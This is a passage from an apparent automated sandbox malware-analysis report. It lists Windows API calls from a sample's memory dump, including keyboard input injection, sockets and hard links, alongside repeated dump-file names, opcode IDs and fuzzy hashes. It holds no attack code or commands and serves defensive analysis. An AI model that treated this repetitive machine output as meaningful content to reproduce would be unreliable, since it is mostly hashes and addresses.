                                                                                                                                                                                                                                                                                            • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 009A25E7
                                                                                                                                                                                                                                                                                            • WSAGetLastError.WSOCK32 ref: 009A25F1
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: ErrorLast$socket
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 1881357543-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 4ffd3ab7bf55e1dbf98f3d2e8e1afa6c2cbcb58219aff4ee05d3506928bd93a0
                                                                                                                                                                                                                                                                                            • Instruction ID: 6fac7f8dcaaeed0a3d4c5610dbc62af4df64f49fd7976af720925b57ad7b0118
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4ffd3ab7bf55e1dbf98f3d2e8e1afa6c2cbcb58219aff4ee05d3506928bd93a0
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F841C374A00210AFE720AF24D886F2A77E5AF45718F54C448F95A9F3D2D772ED418BD1
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetWindowRect.USER32(?,?), ref: 009B6D1A
                                                                                                                                                                                                                                                                                            • ScreenToClient.USER32(?,?), ref: 009B6D4D
                                                                                                                                                                                                                                                                                            • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,?,?,?), ref: 009B6DBA
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Window$ClientMoveRectScreen
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 3880355969-0
                                                                                                                                                                                                                                                                                            • Opcode ID: b0a818288d3c379efcd79722417aab82f604bb9ae7ba763e2f5c9ecc8ee10214
                                                                                                                                                                                                                                                                                            • Instruction ID: 70a78c7a5a2d7ef1bd2951110c5527ff0b9dc9f1e7e79a74e4c43907fb8a61e3
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b0a818288d3c379efcd79722417aab82f604bb9ae7ba763e2f5c9ecc8ee10214
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C5513974A00209EFCF24DF64DA81AEE7BBAFB84320F208559F9159B290D774ED91DB50
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                                            • Opcode ID: b52479afba393f28b4ae93f3568cc2f000edc568981dec6eca78a1152ad78903
                                                                                                                                                                                                                                                                                            • Instruction ID: 54398b4723d59070be8e6e445b94467aa5c15b954fb5fbfcf1aed43bd8ca2609
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b52479afba393f28b4ae93f3568cc2f000edc568981dec6eca78a1152ad78903
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0141F772A00704AFD725EF79CC51B6ABBEDEBC8711F20852EF611DB291D772A9058780
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 009961C8
                                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,00000000), ref: 009961EE
                                                                                                                                                                                                                                                                                            • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 00996213
                                                                                                                                                                                                                                                                                            • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 0099623F
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: CreateHardLink$DeleteErrorFileLast
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 3321077145-0
                                                                                                                                                                                                                                                                                            • Opcode ID: b2a89c1cc9b2a17537e4b5e27cd0362df23322a0325e6e95417be688d7125de0
                                                                                                                                                                                                                                                                                            • Instruction ID: 5a5ccfa9e35571f18f320a41803730c9b62d7ea75b3b254153bed36345760a59
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b2a89c1cc9b2a17537e4b5e27cd0362df23322a0325e6e95417be688d7125de0
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 71414F35600611DFCF11EF14C585A1EB7E2EF89720B198488E85AAB366CB34FD01DB91
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000000,8BE85006,009470E1,00000000,00000000,00948649,?,00948649,?,00000001,009470E1,8BE85006,00000001,00948649,00948649), ref: 0095DC90
                                                                                                                                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0095DD19
                                                                                                                                                                                                                                                                                            • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 0095DD2B
                                                                                                                                                                                                                                                                                            • __freea.LIBCMT ref: 0095DD34
                                                                                                                                                                                                                                                                                              • Part of subcall function 00953B93: RtlAllocateHeap.NTDLL(00000000,?,?,?,00946A79,?,0000015D,?,?,?,?,009485B0,000000FF,00000000,?,?), ref: 00953BC5
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 2652629310-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 3bceefd5249d53f0cc0a9f7c4c479219c1789c0894c82f3874d79da4c16250f4
                                                                                                                                                                                                                                                                                            • Instruction ID: e07f6003a13e28ae16bfc51d4f614b91a1d56943115250b8a854042b700f0677
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3bceefd5249d53f0cc0a9f7c4c479219c1789c0894c82f3874d79da4c16250f4
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: AE31D032A0120AABDF24DF69CC45EAE7BB9EF40711F040128FC04D6190EB35CD58CBA0
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetKeyboardState.USER32(?,00000001,00000040,00000000), ref: 0098B473
                                                                                                                                                                                                                                                                                            • SetKeyboardState.USER32(00000080), ref: 0098B48F
                                                                                                                                                                                                                                                                                            • PostMessageW.USER32(?,00000102,00000001,00000001), ref: 0098B4FD
                                                                                                                                                                                                                                                                                            • SendInput.USER32(00000001,?,0000001C,00000001,00000040,00000000), ref: 0098B54F
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: KeyboardState$InputMessagePostSend
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 432972143-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 977b894c0eeef90c8e62242224484d24929580349c5d3d60b5d1d410580d28ed
                                                                                                                                                                                                                                                                                            • Instruction ID: 565c38a3ebe131187fa14ba6e85b76d5ff305224519accdc09b50f2345548cec
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 977b894c0eeef90c8e62242224484d24929580349c5d3d60b5d1d410580d28ed
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7B316B70A00608AEFF30EB34C8067FE7BB9AB49320F0C421AF095963E2C378D9459761
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetKeyboardState.USER32(?,75C0C0D0,?,00008000), ref: 0098B5B8
                                                                                                                                                                                                                                                                                            • SetKeyboardState.USER32(00000080,?,00008000), ref: 0098B5D4
                                                                                                                                                                                                                                                                                            • PostMessageW.USER32(00000000,00000101,00000000), ref: 0098B63B
                                                                                                                                                                                                                                                                                            • SendInput.USER32(00000001,?,0000001C,75C0C0D0,?,00008000), ref: 0098B68D
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: KeyboardState$InputMessagePostSend
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 432972143-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 2ef9ab572f436f60e1eaf79323b363e1d0106d553bc07e804a5b32690ac830f6
                                                                                                                                                                                                                                                                                            • Instruction ID: 40aa9d85fc59b82cb390ffc309ce7bb7caf6e064a9a30bd8e11d938e6bd5be57
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2ef9ab572f436f60e1eaf79323b363e1d0106d553bc07e804a5b32690ac830f6
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 12313E30D406089EFF30AB64C8057FE7BAAEF85330F0C422AE485563D1E77489459B91
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • ClientToScreen.USER32(?,?), ref: 009B80D4
                                                                                                                                                                                                                                                                                            • GetWindowRect.USER32(?,?), ref: 009B814A
                                                                                                                                                                                                                                                                                            • PtInRect.USER32(?,?,?), ref: 009B815A
                                                                                                                                                                                                                                                                                            • MessageBeep.USER32(00000000), ref: 009B81C6
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Rect$BeepClientMessageScreenWindow
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 1352109105-0
                                                                                                                                                                                                                                                                                            • Opcode ID: c39134c01469850f03b6da5e32e716616383ef9c30eccde331a0c1c1b9d45c3f
                                                                                                                                                                                                                                                                                            • Instruction ID: 3b8492af9b2fda4d6c6da8176be7b148a29155e4bf8480f6554b44009eded7c4
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c39134c01469850f03b6da5e32e716616383ef9c30eccde331a0c1c1b9d45c3f
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3A417E30A0A215DFCB15CF5CCA88BEA77FDBB49324F1445A8E9549B261CB74A883DF50
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetForegroundWindow.USER32 ref: 009B2187
                                                                                                                                                                                                                                                                                              • Part of subcall function 00984393: GetWindowThreadProcessId.USER32(?,00000000), ref: 009843AD
                                                                                                                                                                                                                                                                                              • Part of subcall function 00984393: GetCurrentThreadId.KERNEL32 ref: 009843B4
                                                                                                                                                                                                                                                                                              • Part of subcall function 00984393: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00982F00), ref: 009843BB
                                                                                                                                                                                                                                                                                            • GetCaretPos.USER32(?), ref: 009B219B
                                                                                                                                                                                                                                                                                            • ClientToScreen.USER32(00000000,?), ref: 009B21E8
                                                                                                                                                                                                                                                                                            • GetForegroundWindow.USER32 ref: 009B21EE
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 2759813231-0
                                                                                                                                                                                                                                                                                            • Opcode ID: ad72cc574d8ccb2f470ef566b86cf7cb96c3dd8a02cdd217692170c0f230f1a0
                                                                                                                                                                                                                                                                                            • Instruction ID: c76b24bfe9ac2c1cb01f9c1aa37e97428d13952c4eaed5b1397f5a2084900929
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ad72cc574d8ccb2f470ef566b86cf7cb96c3dd8a02cdd217692170c0f230f1a0
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E53143B1D05119AFCB04EFA9C9C1DEEBBFCEF88314B50846AE415E7211DA719E45CBA0
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                              • Part of subcall function 009241EA: _wcslen.LIBCMT ref: 009241EF
                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 0098E8E2
                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 0098E8F9
                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 0098E924
                                                                                                                                                                                                                                                                                            • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 0098E92F
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: _wcslen$ExtentPoint32Text
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 3763101759-0
                                                                                                                                                                                                                                                                                            • Opcode ID: e155238958f00a44b610afea687e4dc8e2887dfbc121b3c1124b68f018c90829
                                                                                                                                                                                                                                                                                            • Instruction ID: d7246a2cdf52ec0148f6c4fea41ce699f8dd131f4eab10103e5c55aca447f937
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e155238958f00a44b610afea687e4dc8e2887dfbc121b3c1124b68f018c90829
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5921C476D01215EFDB10AFA4D982BAEB7F8EF95360F144065F904BB381D6709E41CBA1
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                              • Part of subcall function 0092249F: GetWindowLongW.USER32(00000000,000000EB), ref: 009224B0
                                                                                                                                                                                                                                                                                            • GetCursorPos.USER32(?), ref: 009B9A5D
                                                                                                                                                                                                                                                                                            • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 009B9A72
                                                                                                                                                                                                                                                                                            • GetCursorPos.USER32(?), ref: 009B9ABA
                                                                                                                                                                                                                                                                                            • DefDlgProcW.USER32(?,0000007B,?,?,?,?), ref: 009B9AF0
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 2864067406-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 0d0cfe6084b003c959cbacc80cdd47e0e4101429ca0d37b102ab140d0d19866c
                                                                                                                                                                                                                                                                                            • Instruction ID: fd04576af7fd02a590c4f848f329adb9a3fd13609c42c3b350aa6e70e20bb544
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0d0cfe6084b003c959cbacc80cdd47e0e4101429ca0d37b102ab140d0d19866c
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1721DC34610018FFCF298F94C988EFA7BB9EF4A360F504165FA058B1A1E7759990EB60
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetFileAttributesW.KERNEL32(?,009BDC30), ref: 0098DBA6
                                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 0098DBB5
                                                                                                                                                                                                                                                                                            • CreateDirectoryW.KERNEL32(?,00000000), ref: 0098DBC4
                                                                                                                                                                                                                                                                                            • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,009BDC30), ref: 0098DC21
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: CreateDirectory$AttributesErrorFileLast
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 2267087916-0
                                                                                                                                                                                                                                                                                            • Opcode ID: e5657e599c49b84cd7e5cd7a6e3c5f2917db6b02a573fcdb9abf82c8e5d3eb13
                                                                                                                                                                                                                                                                                            • Instruction ID: 9d3b8f57603656a65fa6b780db28fb888aa71013196f15fafe8d509c80a427a5
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e5657e599c49b84cd7e5cd7a6e3c5f2917db6b02a573fcdb9abf82c8e5d3eb13
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: EA21A37014A2019F8700EF24D98199BBBE8FE96364F100A1DF4E9C33E1E730D946DB82
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetWindowLongW.USER32(?,000000EC), ref: 009B32A6
                                                                                                                                                                                                                                                                                            • SetWindowLongW.USER32(?,000000EC,00000000), ref: 009B32C0
                                                                                                                                                                                                                                                                                            • SetWindowLongW.USER32(?,000000EC,00000000), ref: 009B32CE
                                                                                                                                                                                                                                                                                            • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 009B32DC
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
